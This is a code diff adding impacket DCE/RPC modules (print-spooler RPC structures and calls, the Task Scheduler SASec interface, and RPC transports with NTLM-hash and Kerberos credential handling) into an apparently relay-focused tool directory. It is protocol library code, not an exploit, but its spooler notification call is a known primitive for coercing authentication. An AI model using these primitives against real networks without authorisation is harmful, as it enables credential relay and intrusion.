+PRINTER_CHANGE_DELETE_PORT               = 0x00400000
+PRINTER_CHANGE_PORT                      = 0x00700000
+PRINTER_CHANGE_ADD_PRINT_PROCESSOR       = 0x01000000
+PRINTER_CHANGE_DELETE_PRINT_PROCESSOR    = 0x04000000
+PRINTER_CHANGE_PRINT_PROCESSOR           = 0x07000000
+PRINTER_CHANGE_ADD_PRINTER               = 0x00000001
+PRINTER_CHANGE_FAILED_CONNECTION_PRINTER = 0x00000008
+PRINTER_CHANGE_SERVER                    = 0x08000000
+
+# 2.2.3.7 Printer Enumeration Flags
+PRINTER_ENUM_LOCAL       = 0x00000002
+PRINTER_ENUM_CONNECTIONS = 0x00000004
+PRINTER_ENUM_NAME        = 0x00000008
+PRINTER_ENUM_REMOTE      = 0x00000010
+PRINTER_ENUM_SHARED      = 0x00000020
+PRINTER_ENUM_NETWORK     = 0x00000040
+PRINTER_ENUM_EXPAND      = 0x00004000
+PRINTER_ENUM_CONTAINER   = 0x00008000
+PRINTER_ENUM_ICON1       = 0x00010000
+PRINTER_ENUM_ICON2       = 0x00020000
+PRINTER_ENUM_ICON3       = 0x00040000
+PRINTER_ENUM_ICON8       = 0x00800000
+PRINTER_ENUM_HIDE        = 0x01000000
+
+
+# 2.2.3.8 Printer Notification Values
+PRINTER_NOTIFY_CATEGORY_2D  = 0x00000000
+PRINTER_NOTIFY_CATEGORY_ALL = 0x00010000
+PRINTER_NOTIFY_CATEGORY_3D  = 0x00020000
+
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.1.1.4 PRINTER_HANDLE
+class PRINTER_HANDLE(NDRSTRUCT):
+    structure =  (
+        ('Data','20s=b""'),
+    )
+    def getAlignment(self):
+        if self._isNDR64 is True:
+            return 8
+        else:
+            return 4
+
+# 2.2.1.2.1 DEVMODE_CONTAINER
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', BYTE_ARRAY),
+    )
+
+class DEVMODE_CONTAINER(NDRSTRUCT):
+    structure =  (
+        ('cbBuf',DWORD),
+        ('pDevMode',PBYTE_ARRAY),
+    )
+
+# 2.2.1.11.1 SPLCLIENT_INFO_1
+class SPLCLIENT_INFO_1(NDRSTRUCT):
+    structure =  (
+        ('dwSize',DWORD),
+        ('pMachineName',LPWSTR),
+        ('pUserName',LPWSTR),
+        ('dwBuildNum',DWORD),
+        ('dwMajorVersion',DWORD),
+        ('dwMinorVersion',DWORD),
+        ('wProcessorArchitecture',USHORT),
+    )
+
+class PSPLCLIENT_INFO_1(NDRPOINTER):
+    referent = (
+        ('Data', SPLCLIENT_INFO_1),
+    )
+
+# 2.2.1.11.2 SPLCLIENT_INFO_2
+class SPLCLIENT_INFO_2(NDRSTRUCT):
+    structure =  (
+        ('notUsed',ULONGLONG),
+    )
+
+class PSPLCLIENT_INFO_2(NDRPOINTER):
+    referent = (
+        ('Data', SPLCLIENT_INFO_2),
+    )
+# 2.2.1.11.3 SPLCLIENT_INFO_3
+class SPLCLIENT_INFO_3(NDRSTRUCT):
+    structure =  (
+        ('cbSize',UINT),
+        ('dwFlags',DWORD),
+        ('dwFlags',DWORD),
+        ('pMachineName',LPWSTR),
+        ('pUserName',LPWSTR),
+        ('dwBuildNum',DWORD),
+        ('dwMajorVersion',DWORD),
+        ('dwMinorVersion',DWORD),
+        ('wProcessorArchitecture',USHORT),
+        ('hSplPrinter',ULONGLONG),
+    )
+
+class PSPLCLIENT_INFO_3(NDRPOINTER):
+    referent = (
+        ('Data', SPLCLIENT_INFO_3),
+    )
+# 2.2.1.2.14 SPLCLIENT_CONTAINER
+class CLIENT_INFO_UNION(NDRUNION):
+    commonHdr = (
+        ('tag', ULONG),
+    )
+    union = {
+        1 : ('pClientInfo1', PSPLCLIENT_INFO_1),
+        2 : ('pNotUsed1', PSPLCLIENT_INFO_2),
+        3 : ('pNotUsed2', PSPLCLIENT_INFO_3),
+    }
+
+class SPLCLIENT_CONTAINER(NDRSTRUCT):
+    structure =  (
+        ('Level',DWORD),
+        ('ClientInfo',CLIENT_INFO_UNION),
+    )
+
+
+# 2.2.1.13.2 RPC_V2_NOTIFY_OPTIONS_TYPE
+class USHORT_ARRAY(NDRUniConformantArray):
+    item = '<H'
+
+class PUSHORT_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', USHORT_ARRAY),
+    )
+
+class RPC_V2_NOTIFY_OPTIONS_TYPE(NDRSTRUCT):
+    structure =  (
+        ('Type',USHORT),
+        ('Reserved0',USHORT),
+        ('Reserved1',DWORD),
+        ('Reserved2',DWORD),
+        ('Count',DWORD),
+        ('pFields',PUSHORT_ARRAY),
+    )
+
+class PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', RPC_V2_NOTIFY_OPTIONS_TYPE),
+    )
+
+# 2.2.1.13.1 RPC_V2_NOTIFY_OPTIONS
+class RPC_V2_NOTIFY_OPTIONS(NDRSTRUCT):
+    structure =  (
+        ('Version',DWORD),
+        ('Reserved',DWORD),
+        ('Count',DWORD),
+        ('pTypes',PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY),
+    )
+
+class PRPC_V2_NOTIFY_OPTIONS(NDRPOINTER):
+    referent = (
+        ('Data', RPC_V2_NOTIFY_OPTIONS),
+    )
+
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.2.1 RpcEnumPrinters (Opnum 0)
+class RpcEnumPrinters(NDRCALL):
+    opnum = 0
+    structure = (
+       ('Flags', DWORD),
+       ('Name', STRING_HANDLE),
+       ('Level', DWORD),
+       ('pPrinterEnum', PBYTE_ARRAY),
+       ('cbBuf', DWORD),
+    )
+
+class RpcEnumPrintersResponse(NDRCALL):
+    structure = (
+       ('pPrinterEnum', PBYTE_ARRAY),
+       ('pcbNeeded', DWORD),
+       ('pcReturned', DWORD),
+       ('ErrorCode', ULONG),
+    )
+# 3.1.4.2.2 RpcOpenPrinter (Opnum 1)
+class RpcOpenPrinter(NDRCALL):
+    opnum = 1
+    structure = (
+       ('pPrinterName', STRING_HANDLE),
+       ('pDatatype', LPWSTR),
+       ('pDevModeContainer', DEVMODE_CONTAINER),
+       ('AccessRequired', DWORD),
+    )
+
+class RpcOpenPrinterResponse(NDRCALL):
+    structure = (
+       ('pHandle', PRINTER_HANDLE),
+       ('ErrorCode', ULONG),
+    )
+
+# 3.1.4.2.9 RpcClosePrinter (Opnum 29)
+class RpcClosePrinter(NDRCALL):
+    opnum = 29
+    structure = (
+       ('phPrinter', PRINTER_HANDLE),
+    )
+
+class RpcClosePrinterResponse(NDRCALL):
+    structure = (
+       ('phPrinter', PRINTER_HANDLE),
+       ('ErrorCode', ULONG),
+    )
+
+# 3.1.4.10.4 RpcRemoteFindFirstPrinterChangeNotificationEx (Opnum 65)
+class RpcRemoteFindFirstPrinterChangeNotificationEx(NDRCALL):
+    opnum = 65
+    structure = (
+       ('hPrinter', PRINTER_HANDLE),
+       ('fdwFlags', DWORD),
+       ('fdwOptions', DWORD),
+       ('pszLocalMachine', LPWSTR),
+       ('dwPrinterLocal', DWORD),
+       ('pOptions', PRPC_V2_NOTIFY_OPTIONS),
+    )
+
+class RpcRemoteFindFirstPrinterChangeNotificationExResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# 3.1.4.2.14 RpcOpenPrinterEx (Opnum 69)
+class RpcOpenPrinterEx(NDRCALL):
+    opnum = 69
+    structure = (
+       ('pPrinterName', STRING_HANDLE),
+       ('pDatatype', LPWSTR),
+       ('pDevModeContainer', DEVMODE_CONTAINER),
+       ('AccessRequired', DWORD),
+       ('pClientInfo', SPLCLIENT_CONTAINER),
+    )
+
+class RpcOpenPrinterExResponse(NDRCALL):
+    structure = (
+       ('pHandle', PRINTER_HANDLE),
+       ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+    0  : (RpcEnumPrinters, RpcEnumPrintersResponse),
+    1  : (RpcOpenPrinter, RpcOpenPrinterResponse),
+    29 : (RpcClosePrinter, RpcClosePrinterResponse),
+    65 : (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
+    69 : (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hRpcOpenPrinter(dce, printerName, pDatatype = NULL, pDevModeContainer = NULL, accessRequired = SERVER_READ):
+    """
+    RpcOpenPrinter retrieves a handle for a printer, port, port monitor, print job, or print server.
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244808.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param string printerName: A string for a printer connection, printer object, server object, job object, port
+    object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
+    (IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
+    call (RPC) binds to, and it MUST uniquely identify a print server on the network.
+    :param string pDatatype: A string that specifies the data type to be associated with the printer handle.
+    :param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
+    DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
+    :param int accessRequired: The access level that the client requires for interacting with the object to which a
+    handle is being opened.
+
+    :return: a RpcOpenPrinterResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcOpenPrinter()
+    request['pPrinterName'] = checkNullString(printerName)
+    request['pDatatype'] = pDatatype
+    if pDevModeContainer is NULL:
+        request['pDevModeContainer']['pDevMode'] = NULL
+    else:
+        request['pDevModeContainer'] = pDevModeContainer
+
+    request['AccessRequired'] = accessRequired
+    return dce.request(request)
+
+def hRpcClosePrinter(dce, phPrinter):
+    """
+    RpcClosePrinter closes a handle to a printer object, server object, job object, or port object.
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244768.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param PRINTER_HANDLE phPrinter: A handle to a printer object, server object, job object, or port object.
+
+    :return: a RpcClosePrinterResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcClosePrinter()
+    request['phPrinter'] = phPrinter
+    return dce.request(request)
+
+
+def hRpcOpenPrinterEx(dce, printerName, pDatatype=NULL, pDevModeContainer=NULL, accessRequired=SERVER_READ,
+                      pClientInfo=NULL):
+    """
+    RpcOpenPrinterEx retrieves a handle for a printer, port, port monitor, print job, or print server
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244809.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param string printerName: A string for a printer connection, printer object, server object, job object, port
+    object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
+    (IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
+    call (RPC) binds to, and it MUST uniquely identify a print server on the network.
+    :param string pDatatype: A string that specifies the data type to be associated with the printer handle.
+    :param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
+    DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
+    :param int accessRequired: The access level that the client requires for interacting with the object to which a
+    handle is being opened.
+    :param SPLCLIENT_CONTAINER pClientInfo: This parameter MUST adhere to the specification in SPLCLIENT_CONTAINER Parameters.
+
+    :return: a RpcOpenPrinterExResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcOpenPrinterEx()
+    request['pPrinterName'] = checkNullString(printerName)
+    request['pDatatype'] = pDatatype
+    if pDevModeContainer is NULL:
+        request['pDevModeContainer']['pDevMode'] = NULL
+    else:
+        request['pDevModeContainer'] = pDevModeContainer
+
+    request['AccessRequired'] = accessRequired
+    if pClientInfo is NULL:
+        raise Exception('pClientInfo cannot be NULL')
+
+    request['pClientInfo'] = pClientInfo
+    return dce.request(request)
+
+
+def hRpcRemoteFindFirstPrinterChangeNotificationEx(dce, hPrinter, fdwFlags, fdwOptions=0, pszLocalMachine=NULL,
+                                                   dwPrinterLocal=0, pOptions=NULL):
+    """
+    creates a remote change notification object that monitors changes to printer objects and sends change notifications
+    to a print client using either RpcRouterReplyPrinter (section 3.2.4.1.2) or RpcRouterReplyPrinterEx (section 3.2.4.1.4)
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244813.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param PRINTER_HANDLE hPrinter: A handle to a printer or server object.
+    :param int fdwFlags: Flags that specify the conditions that are required for a change notification object to enter a signaled state.
+    :param int fdwOptions: The category of printers for which change notifications are returned.
+    :param string pszLocalMachine: A string that represents the name of the client computer.
+    :param int dwPrinterLocal: An implementation-specific unique value that MUST be sufficient for the client to determine
+    whether a call to RpcReplyOpenPrinter by the server is associated with the hPrinter parameter in this call.
+    :param RPC_V2_NOTIFY_OPTIONS pOptions:  An RPC_V2_NOTIFY_OPTIONS structure that specifies printer or job members that the client listens to for notifications.
+
+    :return: a RpcRemoteFindFirstPrinterChangeNotificationExResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcRemoteFindFirstPrinterChangeNotificationEx()
+
+    request['hPrinter'] = hPrinter
+    request['fdwFlags'] = fdwFlags
+    request['fdwOptions'] = fdwOptions
+    request['dwPrinterLocal'] = dwPrinterLocal
+    if pszLocalMachine is NULL:
+        raise Exception('pszLocalMachine cannot be NULL')
+    request['pszLocalMachine'] = checkNullString(pszLocalMachine)
+    request['pOptions'] = pOptions
+    return dce.request(request)
+
+def hRpcEnumPrinters(dce, flags, name = NULL, level = 1):
+    """
+    RpcEnumPrinters enumerates available printers, print servers, domains, or print providers.
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244794.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param int flags: The types of print objects that this method enumerates. The value of this parameter is the
+    result of a bitwise OR of one or more of the Printer Enumeration Flags (section 2.2.3.7).
+    :param string name: NULL or a server name parameter as specified in Printer Server Name Parameters (section 3.1.4.1.4).
+    :param level: The level of printer information structure.
+
+    :return: a RpcEnumPrintersResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcEnumPrinters()
+    request['Flags'] = flags
+    request['Name'] = name
+    request['pPrinterEnum'] = NULL
+    request['Level'] = level
+    bytesNeeded = 0
+    try:
+        dce.request(request)
+    except DCERPCSessionError as e:
+        if str(e).find('ERROR_INSUFFICIENT_BUFFER') < 0:
+            raise
+        bytesNeeded = e.get_packet()['pcbNeeded']
+
+    request = RpcEnumPrinters()
+    request['Flags'] = flags
+    request['Name'] = name
+    request['Level'] = level
+
+    request['cbBuf'] = bytesNeeded
+    request['pPrinterEnum'] = b'a' * bytesNeeded
+    return dce.request(request)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/sasec.py

@@ -0,0 +1,175 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-TSCH] SASec Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, WSTR, NULL
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_SASEC  = uuidtup_to_bin(('378E52B0-C0A9-11CF-822D-00AA0051E40F','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+SASEC_HANDLE = WSTR
+PSASEC_HANDLE = LPWSTR
+
+MAX_BUFFER_SIZE = 273
+
+# 3.2.5.3.4 SASetAccountInformation (Opnum 0)
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON = 0x40000
+
+################################################################################
+# STRUCTURES
+################################################################################
+class WORD_ARRAY(NDRUniConformantArray):
+    item = '<H'
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.2.5.3.4 SASetAccountInformation (Opnum 0)
+class SASetAccountInformation(NDRCALL):
+    opnum = 0
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('pwszJobName', WSTR),
+        ('pwszAccount', WSTR),
+        ('pwszPassword', LPWSTR),
+        ('dwJobFlags', DWORD),
+    )
+
+class SASetAccountInformationResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.3.5 SASetNSAccountInformation (Opnum 1)
+class SASetNSAccountInformation(NDRCALL):
+    opnum = 1
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('pwszAccount', LPWSTR),
+        ('pwszPassword', LPWSTR),
+    )
+
+class SASetNSAccountInformationResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.3.6 SAGetNSAccountInformation (Opnum 2)
+class SAGetNSAccountInformation(NDRCALL):
+    opnum = 2
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('ccBufferSize', DWORD),
+        ('wszBuffer', WORD_ARRAY),
+    )
+
+class SAGetNSAccountInformationResponse(NDRCALL):
+    structure = (
+        ('wszBuffer',WORD_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.3.7 SAGetAccountInformation (Opnum 3)
+class SAGetAccountInformation(NDRCALL):
+    opnum = 3
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('pwszJobName', WSTR),
+        ('ccBufferSize', DWORD),
+        ('wszBuffer', WORD_ARRAY),
+    )
+
+class SAGetAccountInformationResponse(NDRCALL):
+    structure = (
+        ('wszBuffer',WORD_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (SASetAccountInformation, SASetAccountInformationResponse),
+ 1 : (SASetNSAccountInformation, SASetNSAccountInformationResponse),
+ 2 : (SAGetNSAccountInformation, SAGetNSAccountInformationResponse),
+ 3 : (SAGetAccountInformation, SAGetAccountInformationResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hSASetAccountInformation(dce, handle, pwszJobName, pwszAccount, pwszPassword, dwJobFlags=0):
+    request = SASetAccountInformation()
+    request['Handle'] = handle
+    request['pwszJobName'] = checkNullString(pwszJobName)
+    request['pwszAccount'] = checkNullString(pwszAccount)
+    request['pwszPassword'] = checkNullString(pwszPassword)
+    request['dwJobFlags'] = dwJobFlags
+    return dce.request(request)
+
+def hSASetNSAccountInformation(dce, handle, pwszAccount, pwszPassword):
+    request = SASetNSAccountInformation()
+    request['Handle'] = handle
+    request['pwszAccount'] = checkNullString(pwszAccount)
+    request['pwszPassword'] = checkNullString(pwszPassword)
+    return dce.request(request)
+
+def hSAGetNSAccountInformation(dce, handle, ccBufferSize = MAX_BUFFER_SIZE):
+    request = SAGetNSAccountInformation()
+    request['Handle'] = handle
+    request['ccBufferSize'] = ccBufferSize
+    for _ in range(ccBufferSize):
+        request['wszBuffer'].append(0)
+    return dce.request(request)
+
+def hSAGetAccountInformation(dce, handle, pwszJobName, ccBufferSize = MAX_BUFFER_SIZE):
+    request = SAGetAccountInformation()
+    request['Handle'] = handle
+    request['pwszJobName'] = checkNullString(pwszJobName)
+    request['ccBufferSize'] = ccBufferSize
+    for _ in range(ccBufferSize):
+        request['wszBuffer'].append(0)
+    return dce.request(request)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/transport.py

@@ -0,0 +1,592 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   Transport implementations for the DCE/RPC protocol.
+#
+from __future__ import division
+from __future__ import print_function
+
+import binascii
+import os
+import re
+import socket
+
+try:
+    from urllib.parse import urlparse, urlunparse
+except ImportError:
+    from urlparse import urlparse, urlunparse
+
+from impacket import ntlm
+from impacket.dcerpc.v5.rpcrt import DCERPCException, DCERPC_v5, DCERPC_v4
+from impacket.dcerpc.v5.rpch import RPCProxyClient, RPCProxyClientException, RPC_OVER_HTTP_v1, RPC_OVER_HTTP_v2
+from impacket.smbconnection import SMBConnection
+
+class DCERPCStringBinding:
+    parser = re.compile(r'(?:([a-fA-F0-9-]{8}(?:-[a-fA-F0-9-]{4}){3}-[a-fA-F0-9-]{12})@)?' # UUID (opt.)
+                        +'([_a-zA-Z0-9]*):' # Protocol Sequence
+                        +'([^\[]*)' # Network Address (opt.)
+                        +'(?:\[([^\]]*)\])?') # Endpoint and options (opt.)
+
+    def __init__(self, stringbinding):
+        match = DCERPCStringBinding.parser.match(stringbinding)
+        self.__uuid = match.group(1)
+        self.__ps = match.group(2)
+        self.__na = match.group(3)
+        options = match.group(4)
+        if options:
+            options = options.split(',')
+            
+            self.__endpoint = options[0]
+            try:
+                self.__endpoint.index('endpoint=')
+                self.__endpoint = self.__endpoint[len('endpoint='):]
+            except:
+                pass
+
+            self.__options = {}
+            for option in options[1:]:
+                vv = option.split('=', 1)
+                self.__options[vv[0]] = vv[1] if len(vv) > 1 else ''
+        else:
+            self.__endpoint = ''
+            self.__options = {}
+
+    def get_uuid(self):
+        return self.__uuid
+
+    def get_protocol_sequence(self):
+        return self.__ps
+
+    def get_network_address(self):
+        return self.__na
+
+    def set_network_address(self, addr):
+        self.__na = addr
+
+    def get_endpoint(self):
+        return self.__endpoint
+
+    def get_options(self):
+        return self.__options
+
+    def get_option(self, option_name):
+        return self.__options[option_name]
+
+    def is_option_set(self, option_name):
+        return option_name in self.__options
+
+    def unset_option(self, option_name):
+        del self.__options[option_name]
+
+    def __str__(self):
+        return DCERPCStringBindingCompose(self.__uuid, self.__ps, self.__na, self.__endpoint, self.__options)
+
+def DCERPCStringBindingCompose(uuid=None, protocol_sequence='', network_address='', endpoint='', options={}):
+    s = ''
+    if uuid:
+        s += uuid + '@'
+    s += protocol_sequence + ':'
+    if network_address:
+        s += network_address
+    if endpoint or options:
+        s += '[' + endpoint
+        if options:
+            s += ',' + ','.join([key if str(val) == '' else "=".join([key, str(val)]) for key, val in options.items()])
+        s += ']'
+
+    return s
+
+def DCERPCTransportFactory(stringbinding):
+    sb = DCERPCStringBinding(stringbinding)
+
+    na = sb.get_network_address()
+    ps = sb.get_protocol_sequence()
+    if 'ncadg_ip_udp' == ps:
+        port = sb.get_endpoint()
+        if port:
+            rpctransport = UDPTransport(na, int(port))
+        else:
+            rpctransport = UDPTransport(na)
+    elif 'ncacn_ip_tcp' == ps:
+        port = sb.get_endpoint()
+        if port:
+            rpctransport = TCPTransport(na, int(port))
+        else:
+            rpctransport = TCPTransport(na)
+    elif 'ncacn_http' == ps:
+        port = sb.get_endpoint()
+        if port:
+            rpctransport = HTTPTransport(na, int(port))
+        else:
+            rpctransport = HTTPTransport(na)
+    elif 'ncacn_np' == ps:
+        named_pipe = sb.get_endpoint()
+        if named_pipe:
+            named_pipe = named_pipe[len(r'\pipe'):]
+            rpctransport = SMBTransport(na, filename = named_pipe)
+        else:
+            rpctransport = SMBTransport(na)
+    elif 'ncalocal' == ps:
+        named_pipe = sb.get_endpoint()
+        rpctransport = LOCALTransport(filename = named_pipe)
+    else:
+        raise DCERPCException("Unknown protocol sequence.")
+
+    rpctransport.set_stringbinding(sb)
+    return rpctransport
+
+class DCERPCTransport:
+
+    DCERPC_class = DCERPC_v5
+
+    def __init__(self, remoteName, dstport):
+        self.__remoteName = remoteName
+        self.__remoteHost = remoteName
+        self.__dstport = dstport
+        self._stringbinding = None
+        self._max_send_frag = None
+        self._max_recv_frag = None
+        self._domain = ''
+        self._lmhash = ''
+        self._nthash = ''
+        self.__connect_timeout = None
+        self._doKerberos = False
+        self._username = ''
+        self._password = ''
+        self._domain   = ''
+        self._aesKey   = None
+        self._TGT      = None
+        self._TGS      = None
+        self._kdcHost  = None
+        self.set_credentials('','')
+        # Strict host validation - off by default and currently only for
+        # SMBTransport
+        self._strict_hostname_validation = False
+        self._validation_allow_absent = True
+        self._accepted_hostname = ''
+
+    def connect(self):
+        raise RuntimeError('virtual function')
+    def send(self,data=0, forceWriteAndx = 0, forceRecv = 0):
+        raise RuntimeError('virtual function')
+    def recv(self, forceRecv = 0, count = 0):
+        raise RuntimeError('virtual function')
+    def disconnect(self):
+        raise RuntimeError('virtual function')
+    def get_socket(self):
+        raise RuntimeError('virtual function')
+
+    def get_connect_timeout(self):
+        return self.__connect_timeout
+    def set_connect_timeout(self, timeout):
+        self.__connect_timeout = timeout
+
+    def getRemoteName(self):
+        return self.__remoteName
+
+    def setRemoteName(self, remoteName):
+        """This method only makes sense before connection for most protocols."""
+        self.__remoteName = remoteName
+
+    def getRemoteHost(self):
+        return self.__remoteHost
+
+    def setRemoteHost(self, remoteHost):
+        """This method only makes sense before connection for most protocols."""
+        self.__remoteHost = remoteHost
+
+    def get_dport(self):
+        return self.__dstport
+    def set_dport(self, dport):
+        """This method only makes sense before connection for most protocols."""
+        self.__dstport = dport
+
+    def get_stringbinding(self):
+        return self._stringbinding
+
+    def set_stringbinding(self, stringbinding):
+        self._stringbinding = stringbinding
+
+    def get_addr(self):
+        return self.getRemoteHost(), self.get_dport()
+    def set_addr(self, addr):
+        """This method only makes sense before connection for most protocols."""
+        self.setRemoteHost(addr[0])
+        self.set_dport(addr[1])
+
+    def set_kerberos(self, flag, kdcHost = None):
+        self._doKerberos = flag
+        self._kdcHost = kdcHost
+
+    def get_kerberos(self):
+        return self._doKerberos
+
+    def get_kdcHost(self):
+        return self._kdcHost
+
+    def set_max_fragment_size(self, send_fragment_size):
+        # -1 is default fragment size: 0 (don't fragment)
+        #  0 is don't fragment
+        #    other values are max fragment size
+        if send_fragment_size == -1:
+            self.set_default_max_fragment_size()
+        else:
+            self._max_send_frag = send_fragment_size
+
+    def set_hostname_validation(self, validate, accept_empty, hostname):
+        self._strict_hostname_validation = validate
+        self._validation_allow_absent = accept_empty
+        self._accepted_hostname = hostname
+
+    def set_default_max_fragment_size(self):
+        # default is 0: don't fragment.
+        # subclasses may override this method
+        self._max_send_frag = 0
+
+    def get_credentials(self):
+        return (
+            self._username,
+            self._password,
+            self._domain,
+            self._lmhash,
+            self._nthash,
+            self._aesKey,
+            self._TGT,
+            self._TGS)
+
+    def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+        self._username = username
+        self._password = password
+        self._domain   = domain
+        self._aesKey   = aesKey
+        self._TGT      = TGT
+        self._TGS      = TGS
+        if lmhash != '' or nthash != '':
+            if len(lmhash) % 2:
+                lmhash = '0%s' % lmhash
+            if len(nthash) % 2:
+                nthash = '0%s' % nthash
+            try: # just in case they were converted already
+               self._lmhash = binascii.unhexlify(lmhash)
+               self._nthash = binascii.unhexlify(nthash)
+            except:
+               self._lmhash = lmhash
+               self._nthash = nthash
+               pass
+
+    def doesSupportNTLMv2(self):
+        # By default we'll be returning the library's default. Only on SMB Transports we might be able to know it beforehand
+        return ntlm.USE_NTLMv2
+
+    def get_dce_rpc(self):
+        return DCERPC_v5(self)
+
+class UDPTransport(DCERPCTransport):
+    "Implementation of ncadg_ip_udp protocol sequence"
+
+    DCERPC_class = DCERPC_v4
+
+    def __init__(self, remoteName, dstport = 135):
+        DCERPCTransport.__init__(self, remoteName, dstport)
+        self.__socket = 0
+        self.set_connect_timeout(30)
+        self.__recv_addr = ''
+
+    def connect(self):
+        try:
+            af, socktype, proto, canonname, sa = socket.getaddrinfo(self.getRemoteHost(), self.get_dport(), 0, socket.SOCK_DGRAM)[0]
+            self.__socket = socket.socket(af, socktype, proto)
+            self.__socket.settimeout(self.get_connect_timeout())
+        except socket.error as msg:
+            self.__socket = None
+            raise DCERPCException("Could not connect: %s" % msg)
+
+        return 1
+
+    def disconnect(self):
+        try:
+            self.__socket.close()
+        except socket.error:
+            self.__socket = None
+            return 0
+        return 1
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        self.__socket.sendto(data, (self.getRemoteHost(), self.get_dport()))
+
+    def recv(self, forceRecv = 0, count = 0):
+        buffer, self.__recv_addr = self.__socket.recvfrom(8192)
+        return buffer
+
+    def get_recv_addr(self):
+        return self.__recv_addr
+
+    def get_socket(self):
+        return self.__socket
+
+class TCPTransport(DCERPCTransport):
+    """Implementation of ncacn_ip_tcp protocol sequence"""
+
+    def __init__(self, remoteName, dstport = 135):
+        DCERPCTransport.__init__(self, remoteName, dstport)
